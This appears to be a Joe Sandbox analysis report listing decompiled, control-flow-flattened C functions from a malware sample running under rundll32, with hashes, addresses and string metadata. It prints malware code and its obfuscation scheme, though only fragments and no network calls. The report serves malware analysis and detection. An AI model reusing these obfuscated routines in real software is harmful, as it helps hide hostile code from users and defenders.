                                                                                                                                                            • Opcode Fuzzy Hash: 1d3966bd5d5f96d3a6d87ec4215b7e6fed083ec5c9eec0ea98fa54c947001be6
                                                                                                                                                            • Instruction Fuzzy Hash: 85C10EB11083818FC769DF25C58A91BFBF1BBC0758F508A1DF1969A260D7B58A4ACF42
                                                                                                                                                            Uniqueness

                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                            C-Code - Quality: 96%
                                                                                                                                                            			E0038A2E8(intOrPtr __ecx, intOrPtr* __edx) {
                                                                                                                                                            				intOrPtr _v4;
                                                                                                                                                            				intOrPtr* _v8;
                                                                                                                                                            				intOrPtr _v12;
                                                                                                                                                            				char _v16;
                                                                                                                                                            				signed int _v20;
                                                                                                                                                            				intOrPtr _v24;
                                                                                                                                                            				signed int _v28;
                                                                                                                                                            				signed int _v32;
                                                                                                                                                            				signed int _v36;
                                                                                                                                                            				signed int _v40;
                                                                                                                                                            				signed int _v44;
                                                                                                                                                            				intOrPtr _v48;
                                                                                                                                                            				signed int _v52;
                                                                                                                                                            				signed int _v56;
                                                                                                                                                            				signed int _v60;
                                                                                                                                                            				signed int _v64;
                                                                                                                                                            				signed int _v68;
                                                                                                                                                            				signed int _v72;
                                                                                                                                                            				signed int _v76;
                                                                                                                                                            				signed int _v80;
                                                                                                                                                            				signed int _v84;
                                                                                                                                                            				signed int _v88;
                                                                                                                                                            				signed int _v92;
                                                                                                                                                            				intOrPtr _t184;
                                                                                                                                                            				intOrPtr* _t189;
                                                                                                                                                            				intOrPtr _t193;
                                                                                                                                                            				intOrPtr _t196;
                                                                                                                                                            				intOrPtr _t197;
                                                                                                                                                            				intOrPtr _t198;
                                                                                                                                                            				intOrPtr _t204;
                                                                                                                                                            				intOrPtr _t205;
                                                                                                                                                            				signed int _t223;
                                                                                                                                                            				signed int _t224;
                                                                                                                                                            				signed int _t225;
                                                                                                                                                            				intOrPtr _t226;
                                                                                                                                                            				void* _t228;
                                                                                                                                                            				signed int _t229;
                                                                                                                                                            				intOrPtr _t230;
                                                                                                                                                            				signed int* _t231;
                                                                                                                                                            
                                                                                                                                                            				_t198 = __ecx;
                                                                                                                                                            				_t231 =  &_v92;
                                                                                                                                                            				_v8 = __edx;
                                                                                                                                                            				_v24 = __ecx;
                                                                                                                                                            				_v28 = 0x24c7b9;
                                                                                                                                                            				_v28 = _v28 << 9;
                                                                                                                                                            				_v28 = _v28 ^ 0x498f7200;
                                                                                                                                                            				_v76 = 0x5897f7;
                                                                                                                                                            				_v76 = _v76 + 0xffffedf4;
                                                                                                                                                            				_v76 = _v76 << 0xf;
                                                                                                                                                            				_v76 = _v76 + 0x73e5;
                                                                                                                                                            				_v76 = _v76 ^ 0x42f7f56f;
                                                                                                                                                            				_v52 = 0x46ab19;
                                                                                                                                                            				_v52 = _v52 << 0xd;
                                                                                                                                                            				_t228 = 0xe611c04;
                                                                                                                                                            				_v20 = _v20 & 0x00000000;
                                                                                                                                                            				_t223 = 0x66;
                                                                                                                                                            				_v52 = _v52 / _t223;
                                                                                                                                                            				_v52 = _v52 ^ 0x0211beab;
                                                                                                                                                            				_v80 = 0x97c948;
                                                                                                                                                            				_v80 = _v80 ^ 0xfb972484;
                                                                                                                                                            				_v80 = _v80 << 2;
                                                                                                                                                            				_v80 = _v80 << 0xf;
                                                                                                                                                            				_v80 = _v80 ^ 0xdb950905;
                                                                                                                                                            				_v44 = 0x96980f;
                                                                                                                                                            				_v44 = _v44 ^ 0xfeb8bb56;
                                                                                                                                                            				_v44 = _v44 ^ 0xfe2f3013;
                                                                                                                                                            				_v64 = 0x454cfa;
                                                                                                                                                            				_v64 = _v64 ^ 0x45fe36ac;
                                                                                                                                                            				_t224 = 0x43;
                                                                                                                                                            				_v64 = _v64 / _t224;
                                                                                                                                                            				_v64 = _v64 ^ 0x010b84d0;
                                                                                                                                                            				_v68 = 0xb73a82;
                                                                                                                                                            				_v68 = _v68 | 0xd419dac3;
                                                                                                                                                            				_t225 = 0x23;
                                                                                                                                                            				_v68 = _v68 / _t225;
                                                                                                                                                            				_v68 = _v68 ^ 0x061f1f3c;
                                                                                                                                                            				_v60 = 0xe80863;
                                                                                                                                                            				_v60 = _v60 * 7;
                                                                                                                                                            				_v60 = _v60 ^ 0x88fb80a0;
                                                                                                                                                            				_v60 = _v60 ^ 0x8ea007f2;
                                                                                                                                                            				_v40 = 0x80f530;
                                                                                                                                                            				_v40 = _v40 ^ 0xcef24483;
                                                                                                                                                            				_v40 = _v40 ^ 0xce7935e2;
                                                                                                                                                            				_v92 = 0x233377;
                                                                                                                                                            				_v92 = _v92 ^ 0x61e14959;
                                                                                                                                                            				_v92 = _v92 + 0xffffa5e4;
                                                                                                                                                            				_v92 = _v92 + 0xf94b;
                                                                                                                                                            				_v92 = _v92 ^ 0x61c7ad44;
                                                                                                                                                            				_v88 = 0xbad9cc;
                                                                                                                                                            				_v88 = _v88 | 0x5a2a09a8;
                                                                                                                                                            				_v88 = _v88 * 0x2f;
                                                                                                                                                            				_v88 = _v88 | 0xecc1c683;
                                                                                                                                                            				_v88 = _v88 ^ 0xecc3849f;
                                                                                                                                                            				_v56 = 0xb0d301;
                                                                                                                                                            				_v56 = _v56 + 0xa0bb;
                                                                                                                                                            				_v56 = _v56 << 0xf;
                                                                                                                                                            				_v56 = _v56 ^ 0xb9db0742;
                                                                                                                                                            				_v36 = 0xab48cf;
	_v36 = _v36 * 0x24;
	_v36 = _v36 ^ 0x1811952a;
	_v84 = 0x104632;
	_v84 = _v84 + 0x4a21;
	_v84 = _v84 ^ 0x8dbd106a;
	_v84 = _v84 + 0xfe54;
	_v84 = _v84 ^ 0x8daed025;
	_t226 = _v4;
	_t197 = _v8;
	_t230 = _v8;
	_v72 = 0x1611ea;
	_v72 = _v72 ^ 0xe055e86d;
	_v72 = _v72 >> 0xd;
	_v72 = _v72 >> 5;
	_v72 = _v72 ^ 0x0003993e;
	_v32 = 0x799484;
	_v32 = _v32 ^ 0xb4488d59;
	_v32 = _v32 ^ 0xb439947f;
	L1:
	while(1) {
		do {
			while(_t228 != 0x5161e0c) {
				if(_t228 == 0xb95f952) {
					_t229 = E0038C032( &_v16, _t198, _t184, _t230, _v44, _v64, _v68);
					_t231 =  &(_t231[5]);
					_v20 = _t229;
					if(_t229 == 0) {
						L18:
						E00388519(_v72, _v32, _t197);
					} else {
						_t204 = _v16;
						if(_t204 == 0) {
							L17:
							if(_t229 != 0) {
								_t189 = _v8;
								*_t189 = _t197;
								*((intOrPtr*)(_t189 + 4)) = _t226 - _t230;
							} else {
								goto L18;
							}
						} else {
							_v48 = _v48 + _t204;
							_t230 = _t230 - _t204;
							if(_t230 != 0) {
								L10:
								_t184 = _v48;
								L11:
								_t198 = _v24;
								_t228 = 0xb95f952;
								continue;
							} else {
								_t205 = _t226 + _t226;
								_push(_t205);
								_push(_t205);
								_v12 = _t205;
								_t193 = E00377FF2(_t205);
								_v48 = _t193;
								if(_t193 == 0) {
									goto L17;
								} else {
									E0037ED7E(_v88, _t193, _v56, _t197, _t226);
									E00388519(_v36, _v84, _t197);
									_t197 = _v48;
									_t230 = _t226;
									_t231 =  &(_t231[4]);
									_t196 = _t197 + _t226;
									_t226 = _v12;
									_v48 = _t196;
									if(_t230 == 0) {
										goto L17;
									} else {
										goto L10;
									}
								}
							}
						}
					}
				} else {
					if(_t228 != 0xe611c04) {
						goto L15;
					} else {
						_t228 = 0x5161e0c;
						continue;
					}
				}
				L20:
				return _t229;
			}
			_t226 = 0x10000;
			_push(_t198);
			_push(_t198);
			_t184 = E00377FF2(0x10000);
			_t197 = _t184;
			if(_t197 == 0) {
				_t198 = _v24;
				_t228 = 0xa3056fc;
				goto L15;
			} else {
				_v48 = _t184;
				_t230 = 0x10000;
				goto L11;
			}
			goto L20;
			L15:
			_t184 = _v48;
		} while (_t228 != 0xa3056fc);
		_t229 = _v20;
		goto L17;
	}
}










































                                                                                                                                                            0x0038a576
                                                                                                                                                            0x0038a576
                                                                                                                                                            0x0038a57a
                                                                                                                                                            0x0038a57c
                                                                                                                                                            0x0038a5df
                                                                                                                                                            0x0038a5df
                                                                                                                                                            0x0038a5e3
                                                                                                                                                            0x0038a5e3
                                                                                                                                                            0x0038a5e7
                                                                                                                                                            0x00000000
                                                                                                                                                            0x0038a57e
                                                                                                                                                            0x0038a582
                                                                                                                                                            0x0038a58f
                                                                                                                                                            0x0038a590
                                                                                                                                                            0x0038a591
                                                                                                                                                            0x0038a595
                                                                                                                                                            0x0038a59a
                                                                                                                                                            0x0038a5a2
                                                                                                                                                            0x00000000
                                                                                                                                                            0x0038a5a8
                                                                                                                                                            0x0038a5b4
                                                                                                                                                            0x0038a5c2
                                                                                                                                                            0x0038a5c7
                                                                                                                                                            0x0038a5cb
                                                                                                                                                            0x0038a5cd
                                                                                                                                                            0x0038a5d0
                                                                                                                                                            0x0038a5d3
                                                                                                                                                            0x0038a5d7
                                                                                                                                                            0x0038a5dd
                                                                                                                                                            0x00000000
                                                                                                                                                            0x00000000
                                                                                                                                                            0x00000000
                                                                                                                                                            0x00000000
                                                                                                                                                            0x0038a5dd
                                                                                                                                                            0x0038a5a2
                                                                                                                                                            0x0038a57c
                                                                                                                                                            0x0038a570
                                                                                                                                                            0x0038a52d
                                                                                                                                                            0x0038a533
                                                                                                                                                            0x00000000
                                                                                                                                                            0x0038a539
                                                                                                                                                            0x0038a539
                                                                                                                                                            0x00000000
                                                                                                                                                            0x0038a539
                                                                                                                                                            0x0038a533
                                                                                                                                                            0x0038a65d
                                                                                                                                                            0x0038a665
                                                                                                                                                            0x0038a665
                                                                                                                                                            0x0038a5f5
                                                                                                                                                            0x0038a604
                                                                                                                                                            0x0038a605
                                                                                                                                                            0x0038a606
                                                                                                                                                            0x0038a60b
                                                                                                                                                            0x0038a611
                                                                                                                                                            0x0038a61b
                                                                                                                                                            0x0038a61f
                                                                                                                                                            0x00000000
                                                                                                                                                            0x0038a613
                                                                                                                                                            0x0038a613
                                                                                                                                                            0x0038a617
                                                                                                                                                            0x00000000
                                                                                                                                                            0x0038a617
                                                                                                                                                            0x00000000
                                                                                                                                                            0x0038a624
                                                                                                                                                            0x0038a624
                                                                                                                                                            0x0038a628
                                                                                                                                                            0x0038a634
                                                                                                                                                            0x00000000
                                                                                                                                                            0x0038a634

                                                                                                                                                            Strings
                                                                                                                                                            Memory Dump Source
                                                                                                                                                            • Source File: 00000009.00000002.492028130.0000000000371000.00000020.00000800.00020000.00000000.sdmp, Offset: 00370000, based on PE: true
                                                                                                                                                            • Associated: 00000009.00000002.492020139.0000000000370000.00000004.00000800.00020000.00000000.sdmp
                                                                                                                                                            • Associated: 00000009.00000002.492071088.0000000000393000.00000004.00000800.00020000.00000000.sdmp
                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                            • Snapshot File: hcaresult_9_2_370000_rundll32.jbxd
                                                                                                                                                            Yara matches
                                                                                                                                                            Similarity
                                                                                                                                                            • API ID:
                                                                                                                                                            • String ID: !J$YIa$mU$s
                                                                                                                                                            • API String ID: 0-3335770892
                                                                                                                                                            • Opcode ID: a2c96b5523714fc353019ef791256b388c8b4530006014acc88a687be62f7107
                                                                                                                                                            • Instruction ID: 3d635f4bd0141e00b6d4cb0e4ae73a0b1eabb213a8d73cb559f3ffebbc44b838
                                                                                                                                                            • Opcode Fuzzy Hash: a2c96b5523714fc353019ef791256b388c8b4530006014acc88a687be62f7107
                                                                                                                                                            • Instruction Fuzzy Hash: 15913FB19093809BC355DF29C18580BFBF1BBC5B58F548A5EF9959B220D3B4DA09CB83
                                                                                                                                                            Uniqueness

                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                            C-Code - Quality: 96%
                                                                                                                                                            			E00374EE3(intOrPtr _a4, intOrPtr _a8) {
                                                                                                                                                            				signed int _v8;
                                                                                                                                                            				signed int _v12;
                                                                                                                                                            				signed int _v16;
                                                                                                                                                            				signed int _v20;
                                                                                                                                                            				signed int _v24;
                                                                                                                                                            				signed int _v28;
                                                                                                                                                            				signed int _v32;
                                                                                                                                                            				signed int _v36;
                                                                                                                                                            				signed int _v40;
                                                                                                                                                            				signed int _v44;
                                                                                                                                                            				signed int _v48;
                                                                                                                                                            				signed int _v52;
                                                                                                                                                            				signed int _v56;
                                                                                                                                                            				signed int _v60;
                                                                                                                                                            				signed int _v64;
                                                                                                                                                            				signed int _v68;
                                                                                                                                                            				signed int _v72;
                                                                                                                                                            				signed int _v76;
                                                                                                                                                            				signed int _v80;
                                                                                                                                                            				signed int _v84;
                                                                                                                                                            				intOrPtr _v88;
                                                                                                                                                            				char _v608;
                                                                                                                                                            				void* _t203;
                                                                                                                                                            				void* _t204;
                                                                                                                                                            				void* _t207;
                                                                                                                                                            				signed int _t212;
                                                                                                                                                            				signed int _t213;
                                                                                                                                                            				signed int _t214;
                                                                                                                                                            				signed int _t215;
                                                                                                                                                            				intOrPtr _t216;
                                                                                                                                                            				void* _t221;
                                                                                                                                                            
                                                                                                                                                            				_v84 = _v84 & 0x00000000;
                                                                                                                                                            				_v88 = 0xf9097a;
                                                                                                                                                            				_v32 = 0xbcbe1d;
                                                                                                                                                            				_v32 = _v32 << 9;
                                                                                                                                                            				_v32 = _v32 << 9;
                                                                                                                                                            				_v32 = _v32 << 0xb;
                                                                                                                                                            				_v32 = _v32 ^ 0xa0062323;
                                                                                                                                                            				_v16 = 0x782140;
                                                                                                                                                            				_v16 = _v16 + 0xfffffe34;
                                                                                                                                                            				_v16 = _v16 + 0xfffffe18;
                                                                                                                                                            				_v16 = _v16 << 0xa;
                                                                                                                                                            				_v16 = _v16 ^ 0xe0701d9a;
                                                                                                                                                            				_v40 = 0x7af846;
                                                                                                                                                            				_v40 = _v40 + 0xffff28b3;
                                                                                                                                                            				_v40 = _v40 << 0xd;
                                                                                                                                                            				_v40 = _v40 + 0xffffd351;
                                                                                                                                                            				_v40 = _v40 ^ 0x441384bc;
                                                                                                                                                            				_v68 = 0xebfd4;
                                                                                                                                                            				_v68 = _v68 + 0xffff2b98;
                                                                                                                                                            				_t212 = 0x4b;
                                                                                                                                                            				_v68 = _v68 / _t212;
                                                                                                                                                            				_v68 = _v68 ^ 0x000f3184;
                                                                                                                                                            				_v48 = 0x77c678;
                                                                                                                                                            				_t213 = 0x72;
                                                                                                                                                            				_v48 = _v48 * 0x4d;
                                                                                                                                                            				_v48 = _v48 + 0x6b8c;
                                                                                                                                                            				_v48 = _v48 ^ 0x240efbe4;
                                                                                                                                                            				_v24 = 0xae1064;
                                                                                                                                                            				_v24 = _v24 / _t213;
                                                                                                                                                            				_v24 = _v24 << 7;
                                                                                                                                                            				_v24 = _v24 ^ 0x1be7fa9d;
                                                                                                                                                            				_v24 = _v24 ^ 0x1b226397;
                                                                                                                                                            				_v72 = 0x44bde7;
                                                                                                                                                            				_v72 = _v72 | 0x5f63ee23;
                                                                                                                                                            				_v72 = _v72 ^ 0x5f6de837;
                                                                                                                                                            				_v56 = 0x5a94a4;
                                                                                                                                                            				_v56 = _v56 >> 9;
                                                                                                                                                            				_t214 = 0xc;
                                                                                                                                                            				_v56 = _v56 * 0x2a;
                                                                                                                                                            				_v56 = _v56 ^ 0x0003dc1b;
                                                                                                                                                            				_v8 = 0x2a4d30;
                                                                                                                                                            				_v8 = _v8 + 0xff2b;
                                                                                                                                                            				_v8 = _v8 | 0x9a82811b;
                                                                                                                                                            				_v8 = _v8 << 0xc;
                                                                                                                                                            				_v8 = _v8 ^ 0xbcdbc31f;
                                                                                                                                                            				_v64 = 0xa41a91;
                                                                                                                                                            				_v64 = _v64 | 0x62aa1889;
                                                                                                                                                            				_v64 = _v64 << 0xd;
                                                                                                                                                            				_v64 = _v64 ^ 0xc357e7aa;
                                                                                                                                                            				_v36 = 0x90fe9;
                                                                                                                                                            				_v36 = _v36 >> 0xa;
                                                                                                                                                            				_v36 = _v36 | 0x57d87c49;
                                                                                                                                                            				_v36 = _v36 / _t214;
                                                                                                                                                            				_v36 = _v36 ^ 0x0755636a;
                                                                                                                                                            				_v28 = 0x5fda7e;
                                                                                                                                                            				_v28 = _v28 + 0xffff2d0f;
                                                                                                                                                            				_v28 = _v28 << 0xa;
                                                                                                                                                            				_v28 = _v28 + 0xdffb;
                                                                                                                                                            				_v28 = _v28 ^ 0x7c1a8a5e;
                                                                                                                                                            				_v20 = 0xaf632f;
                                                                                                                                                            				_v20 = _v20 >> 8;
                                                                                                                                                            				_v20 = _v20 << 9;
                                                                                                                                                            				_v20 = _v20 >> 0xf;
                                                                                                                                                            				_v20 = _v20 ^ 0x0003fa93;
                                                                                                                                                            				_v12 = 0x960758;
                                                                                                                                                            				_v12 = _v12 ^ 0x64ee01f0;
                                                                                                                                                            				_v12 = _v12 | 0x3d3dd2ba;
                                                                                                                                                            				_v12 = _v12 << 7;
                                                                                                                                                            				_v12 = _v12 ^ 0xbeed48c5;
                                                                                                                                                            				_v80 = 0xba0fdf;
                                                                                                                                                            				_v80 = _v80 + 0xfd2d;
                                                                                                                                                            				_v80 = _v80 ^ 0x00b93168;
                                                                                                                                                            				_v60 = 0x5f834c;
                                                                                                                                                            				_v60 = _v60 ^ 0x963b7b6a;
                                                                                                                                                            				_t215 = 0x3f;
                                                                                                                                                            				_v60 = _v60 * 0x3e;
                                                                                                                                                            				_v60 = _v60 ^ 0x6c73d449;
                                                                                                                                                            				_v76 = 0x4b89c6;
                                                                                                                                                            				_v76 = _v76 >> 6;
                                                                                                                                                            				_v76 = _v76 ^ 0x0008f57a;
                                                                                                                                                            				_v52 = 0x3d488e;
                                                                                                                                                            				_v52 = _v52 << 6;
                                                                                                                                                            				_v52 = _v52 << 8;
                                                                                                                                                            				_v52 = _v52 ^ 0x5226582a;
                                                                                                                                                            				_v44 = 0x8cf369;
                                                                                                                                                            				_v44 = _v44 ^ 0x25329c0c;
                                                                                                                                                            				_v44 = _v44 / _t215;
                                                                                                                                                            				_v44 = _v44 >> 0xe;
                                                                                                                                                            				_v44 = _v44 ^ 0x0005c7da;
                                                                                                                                                            				_t216 =  *0x393e10; // 0x0
                                                                                                                                                            				_t203 = E0037B6CF(_t216 + 0x1c, _v32, _v16, _v40);
                                                                                                                                                            				_t241 = _a4 + 0x2c;
                                                                                                                                                            				_t204 = E0037B23C(_v68, _v48, _a4 + 0x2c, _v24, _v72, _t203);
                                                                                                                                                            				_t248 = _t204;
                                                                                                                                                            				if(_t204 != 0) {
                                                                                                                                                            					_push(_v64);
                                                                                                                                                            					_push(_v8);
                                                                                                                                                            					_t207 = E0038DCF7(_v56, 0x371000, _t248);
                                                                                                                                                            					_pop(_t221);
                                                                                                                                                            					E003747CE( *((intOrPtr*)(_a8 + 0x18)), _v36, _t221, _v28, _v20, _t207, _t241, _v12, _v80);
                                                                                                                                                            					E0037A8B0(_v60, _t207, _v76);
                                                                                                                                                            					E00381F8A(_v52, _v44,  &_v608);
                                                                                                                                                            				}
                                                                                                                                                            				return 1;
                                                                                                                                                            			}



































                                                                                                                                                            Strings
                                                                                                                                                            Memory Dump Source
                                                                                                                                                            • Source File: 00000009.00000002.492028130.0000000000371000.00000020.00000800.00020000.00000000.sdmp, Offset: 00370000, based on PE: true
                                                                                                                                                            • Associated: 00000009.00000002.492020139.0000000000370000.00000004.00000800.00020000.00000000.sdmp
                                                                                                                                                            • Associated: 00000009.00000002.492071088.0000000000393000.00000004.00000800.00020000.00000000.sdmp
                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                            • Snapshot File: hcaresult_9_2_370000_rundll32.jbxd
                                                                                                                                                            Yara matches
                                                                                                                                                            Similarity
                                                                                                                                                            • API ID: lstrcmpi
                                                                                                                                                            • String ID: *X&R$0M*$7m_$@!x
                                                                                                                                                            • API String ID: 1586166983-4050865940
                                                                                                                                                            • Opcode ID: 3d1606d3ff977f0e4afa880c40b376133a6e036a9ec1a82e50a7996e875f190b
                                                                                                                                                            • Instruction ID: d15f5588cff653ae377c0bb494ae4f8ec98dfb4f4abd7f8f13375265b62155ea
                                                                                                                                                            • Opcode Fuzzy Hash: 3d1606d3ff977f0e4afa880c40b376133a6e036a9ec1a82e50a7996e875f190b
                                                                                                                                                            • Instruction Fuzzy Hash: B1810272C0121DABCF59DFA1D88A8EEFBB1FB44718F208118E511B6260D7B55A46CF54
                                                                                                                                                            Uniqueness

                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                            C-Code - Quality: 92%
                                                                                                                                                            			E0037EA99(void* __ecx, intOrPtr* __edx, intOrPtr _a4, intOrPtr _a8, intOrPtr _a12, intOrPtr _a16) {
                                                                                                                                                            				signed int _v4;
                                                                                                                                                            				signed int _v8;
                                                                                                                                                            				signed int _v12;
                                                                                                                                                            				signed int _v16;
                                                                                                                                                            				signed int _v20;
                                                                                                                                                            				signed int _v24;
                                                                                                                                                            				signed int _v28;
                                                                                                                                                            				signed int _v32;
                                                                                                                                                            				signed int _v36;
                                                                                                                                                            				signed int _v40;
                                                                                                                                                            				signed int _v44;
                                                                                                                                                            				signed int _v48;
                                                                                                                                                            				signed int _v52;
                                                                                                                                                            				signed int _v56;
                                                                                                                                                            				signed int _v60;
                                                                                                                                                            				signed int _v64;
                                                                                                                                                            				signed int _v68;
                                                                                                                                                            				void* _t136;
                                                                                                                                                            				signed int _t147;
                                                                                                                                                            				void* _t150;
                                                                                                                                                            				intOrPtr* _t152;
                                                                                                                                                            				void* _t154;
                                                                                                                                                            				void* _t165;
                                                                                                                                                            				signed int _t166;
                                                                                                                                                            				signed int _t167;
                                                                                                                                                            				signed int* _t171;
                                                                                                                                                            
                                                                                                                                                            				_push(_a16);
                                                                                                                                                            				_t152 = __edx;
                                                                                                                                                            				_push(_a12);
                                                                                                                                                            				_push(_a8);
                                                                                                                                                            				_push(_a4);
                                                                                                                                                            				_push(__edx);
                                                                                                                                                            				_push(__ecx);
                                                                                                                                                            				E003820B9(_t136);
                                                                                                                                                            				_v52 = 0x4b44d9;
                                                                                                                                                            				_t171 =  &(( &_v68)[6]);
                                                                                                                                                            				_t165 = 0;
                                                                                                                                                            				_t154 = 0x40ad1f2;
                                                                                                                                                            				_t166 = 0x41;
                                                                                                                                                            				_v52 = _v52 * 0x5c;
                                                                                                                                                            				_v52 = _v52 ^ 0xd486af61;
                                                                                                                                                            				_v52 = _v52 ^ 0xcf8a129f;
                                                                                                                                                            				_v24 = 0x8b17cc;
                                                                                                                                                            				_v24 = _v24 + 0xffff02b5;
                                                                                                                                                            				_v24 = _v24 ^ 0x008a1a91;
                                                                                                                                                            				_v64 = 0xcc4e1;
                                                                                                                                                            				_v64 = _v64 ^ 0x71537a57;
                                                                                                                                                            				_v64 = _v64 | 0xbc84d226;
                                                                                                                                                            				_v64 = _v64 + 0x8a58;
                                                                                                                                                            				_v64 = _v64 ^ 0xbde0890e;
                                                                                                                                                            				_v12 = 0x10173e;
                                                                                                                                                            				_v12 = _v12 / _t166;
                                                                                                                                                            				_v12 = _v12 ^ 0x000bb2e7;
                                                                                                                                                            				_v16 = 0xcbf18d;
                                                                                                                                                            				_v16 = _v16 + 0x7f8c;
                                                                                                                                                            				_v16 = _v16 ^ 0x00cd0dea;
                                                                                                                                                            				_v20 = 0x7a67ce;
                                                                                                                                                            				_v20 = _v20 << 1;
                                                                                                                                                            				_v20 = _v20 ^ 0x00fa626e;
                                                                                                                                                            				_v68 = 0x7779f8;
                                                                                                                                                            				_v68 = _v68 + 0xa85e;
                                                                                                                                                            				_v68 = _v68 << 0x10;
                                                                                                                                                            				_v68 = _v68 >> 3;
                                                                                                                                                            				_v68 = _v68 ^ 0x0443aeb4;
                                                                                                                                                            				_v28 = 0xee6391;
                                                                                                                                                            				_v28 = _v28 ^ 0x2bfa2339;
                                                                                                                                                            				_v28 = _v28 ^ 0x2b1bacd2;
                                                                                                                                                            				_v32 = 0x87b642;
                                                                                                                                                            				_v32 = _v32 + 0xffff3baa;
                                                                                                                                                            				_v32 = _v32 ^ 0x008fda80;
                                                                                                                                                            				_v36 = 0x3b697f;
                                                                                                                                                            				_v36 = _v36 | 0x5675f49c;
                                                                                                                                                            				_v36 = _v36 ^ 0x5679bffa;
                                                                                                                                                            				_v40 = 0x254a84;
                                                                                                                                                            				_v40 = _v40 * 0x67;
                                                                                                                                                            				_v40 = _v40 ^ 0x0f0bd396;
                                                                                                                                                            				_v44 = 0xfc206d;
                                                                                                                                                            				_v44 = _v44 * 0x45;
                                                                                                                                                            				_v44 = _v44 ^ 0x43f6aa11;
                                                                                                                                                            				_v56 = 0x3dd941;
                                                                                                                                                            				_v56 = _v56 ^ 0x94d2d45c;
                                                                                                                                                            				_v56 = _v56 >> 9;
                                                                                                                                                            				_v56 = _v56 ^ 0x00419011;
                                                                                                                                                            				_v4 = 0xdcf5c3;
                                                                                                                                                            				_v4 = _v4 ^ 0x0d464ae6;
                                                                                                                                                            				_v4 = _v4 ^ 0x0d938ce3;
                                                                                                                                                            				_v60 = 0xe23f0;
                                                                                                                                                            				_v60 = _v60 ^ 0x0435e191;
                                                                                                                                                            				_v60 = _v60 ^ 0xbde67646;
                                                                                                                                                            				_v60 = _v60 ^ 0xb922f804;
                                                                                                                                                            				_v60 = _v60 ^ 0x00f2260b;
                                                                                                                                                            				_v8 = 0x523a90;
                                                                                                                                                            				_v8 = _v8 * 0x75;
                                                                                                                                                            				_v8 = _v8 ^ 0x259e6962;
                                                                                                                                                            				_v48 = 0x46565e;
                                                                                                                                                            				_t167 = 3;
                                                                                                                                                            				_v48 = _v48 * 0x6a;
                                                                                                                                                            				_t168 = _v4;
                                                                                                                                                            				_v48 = _v48 / _t167;
                                                                                                                                                            				_v48 = _v48 ^ 0x09b4f31e;
                                                                                                                                                            				do {
                                                                                                                                                            					while(_t154 != 0x40ad1f2) {
                                                                                                                                                            						if(_t154 == 0x458d12f) {
                                                                                                                                                            							_t147 = E00378F65(_v12, _v16, _a12, _v20, _v24, _t154, _v64, _v68, _v52, _v28, _t154, 0);
                                                                                                                                                            							_t168 = _t147;
                                                                                                                                                            							_t171 =  &(_t171[0xa]);
                                                                                                                                                            							if(_t147 != 0xffffffff) {
                                                                                                                                                            								_t154 = 0x4af2a99;
                                                                                                                                                            								continue;
                                                                                                                                                            							}
                                                                                                                                                            						} else {
                                                                                                                                                            							if(_t154 == 0x4af2a99) {
                                                                                                                                                            								_t150 = E003719B8(_t154, _v36,  *((intOrPtr*)(_t152 + 4)), _v40, _t168, _v44, _v56, _t152 + 4,  *_t152);
                                                                                                                                                            								_t171 =  &(_t171[8]);
                                                                                                                                                            								_t165 = _t150;
                                                                                                                                                            								_t154 = 0xe5b5021;
                                                                                                                                                            								continue;
                                                                                                                                                            							} else {
                                                                                                                                                            								if(_t154 != 0xe5b5021) {
                                                                                                                                                            									goto L11;
                                                                                                                                                            								} else {
                                                                                                                                                            									E00381E67(_v4, _v60, _v8, _v48, _t168);
                                                                                                                                                            								}
                                                                                                                                                            							}
                                                                                                                                                            						}
                                                                                                                                                            						L6:
                                                                                                                                                            						return _t165;
                                                                                                                                                            					}
                                                                                                                                                            					_t154 = 0x458d12f;
                                                                                                                                                            					L11:
                                                                                                                                                            				} while (_t154 != 0xd2f352d);
                                                                                                                                                            				goto L6;
                                                                                                                                                            			}





























                                                                                                                                                            0x0037ec48
                                                                                                                                                            0x0037ec50
                                                                                                                                                            0x0037ec58
                                                                                                                                                            0x0037ec60
                                                                                                                                                            0x0037ec68
                                                                                                                                                            0x0037ec75
                                                                                                                                                            0x0037ec79
                                                                                                                                                            0x0037ec81
                                                                                                                                                            0x0037ec92
                                                                                                                                                            0x0037ec98
                                                                                                                                                            0x0037eca2
                                                                                                                                                            0x0037eca6
                                                                                                                                                            0x0037ecaa
                                                                                                                                                            0x0037ecb2
                                                                                                                                                            0x0037ecb2
                                                                                                                                                            0x0037ecc0
                                                                                                                                                            0x0037ed52
                                                                                                                                                            0x0037ed57
                                                                                                                                                            0x0037ed59
                                                                                                                                                            0x0037ed5f
                                                                                                                                                            0x0037ed61
                                                                                                                                                            0x00000000
                                                                                                                                                            0x0037ed61
                                                                                                                                                            0x0037ecc2
                                                                                                                                                            0x0037ecc8
                                                                                                                                                            0x0037ed16
                                                                                                                                                            0x0037ed1b
                                                                                                                                                            0x0037ed1e
                                                                                                                                                            0x0037ed20
                                                                                                                                                            0x00000000
                                                                                                                                                            0x0037ecca
                                                                                                                                                            0x0037ecd0
                                                                                                                                                            0x00000000
                                                                                                                                                            0x0037ecd6
                                                                                                                                                            0x0037ece7
                                                                                                                                                            0x0037ecec
                                                                                                                                                            0x0037ecd0
                                                                                                                                                            0x0037ecc8
                                                                                                                                                            0x0037ecef
                                                                                                                                                            0x0037ecf8
                                                                                                                                                            0x0037ecf8
                                                                                                                                                            0x0037ed6b
                                                                                                                                                            0x0037ed6d
                                                                                                                                                            0x0037ed6d
                                                                                                                                                            0x00000000

                                                                                                                                                            Strings
                                                                                                                                                            Memory Dump Source
                                                                                                                                                            • Source File: 00000009.00000002.492028130.0000000000371000.00000020.00000800.00020000.00000000.sdmp, Offset: 00370000, based on PE: true
                                                                                                                                                            • Associated: 00000009.00000002.492020139.0000000000370000.00000004.00000800.00020000.00000000.sdmp
                                                                                                                                                            • Associated: 00000009.00000002.492071088.0000000000393000.00000004.00000800.00020000.00000000.sdmp
                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                            • Snapshot File: hcaresult_9_2_370000_rundll32.jbxd
                                                                                                                                                            Yara matches
                                                                                                                                                            Similarity
                                                                                                                                                            • API ID:
                                                                                                                                                            • String ID: -5/$WzSq$^VF$JF
                                                                                                                                                            • API String ID: 0-2399144359
                                                                                                                                                            • Opcode ID: 1a99258aef2ebd0cedbce0666f862dafcadd34ac8b3dd1b99f29c3393997e72b
